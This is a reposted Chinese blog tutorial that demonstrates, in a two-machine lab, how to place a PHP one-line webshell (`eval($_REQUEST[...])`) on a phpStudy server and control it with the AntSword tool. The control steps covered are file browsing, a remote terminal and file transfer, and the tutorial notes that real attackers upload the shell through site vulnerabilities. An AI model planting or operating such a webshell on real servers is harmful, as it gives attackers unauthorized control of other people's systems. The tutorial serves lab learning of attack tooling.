0


蚁剑连接一句话木马演示

需要准备

一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接。

我这里服务器用win2008R2系统

攻击机用win10

接下来我会演示 php 的一句话木马

其他脚本语言的一句话木马使用过程和这个差别不大

在服务器上安装phpstudy 快速搭建服务器

安装成功后启动apache

尝试打开网站,看看是否成功

出现下面的页面代表成功

现在服务端就配置成功了

现在在攻击端安装菜刀,蚁剑等等类似工具,可以去看怎么安装蚁剑

安装中国蚁剑_undefine-CSDN博客

安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接)

输入服务器ip即可

查看服务器ip\

在win10中成功连接网站

正常情况下需要通过查找网站的漏洞,将一句话木马上传到网站上,但是呢我现在只是演示怎么使用一句话木马的,所以我直接将一句话木马复制到网站中,因为我搭建的网站是php,所以就用php的一句话木马,一句话木马还有asp,jsp之类的,不过不一定像php一样短

Php的一句话木马很简单,就是创建一个文本,写入

<?php eval($_REQUEST[123])?>

即可

123就是你用来控制的密码,可以随便取

网上有很多,可以自己去查

将后缀改为.php即可

打开网站的根目录

将一句话木马放进去

要记住它的文件名还有路径,我这里放在根目录所以就不用记路径了,这点也说明了当你想尽办法把木马上传到网站的时候,却不知道它在哪里也是没有用的。

回到攻击端,打开蚁剑

右键空白区域

选择添加数据

然后输入一句话木马位置,和连接的密码,编码方式随便

点击测试连接,显示连接成功说明一句话木马可用

然后点添加就可以添加到目录了

双击即可查看对方目录

还可以右键目标打开终端,输入命令,不过能够用什么命令还得看你有什么权限,这就涉及提权了

还有很多的功能比如上传下载,不过这就要自己摸索,查看蚁剑的文档了


本文转载自: https://blog.csdn.net/qq_54780911/article/details/121996988
版权归原作者 开始即是结束 所有, 如有侵权,请联系我们删除。

“蚁剑连接一句话木马演示”的评论:

还没有评论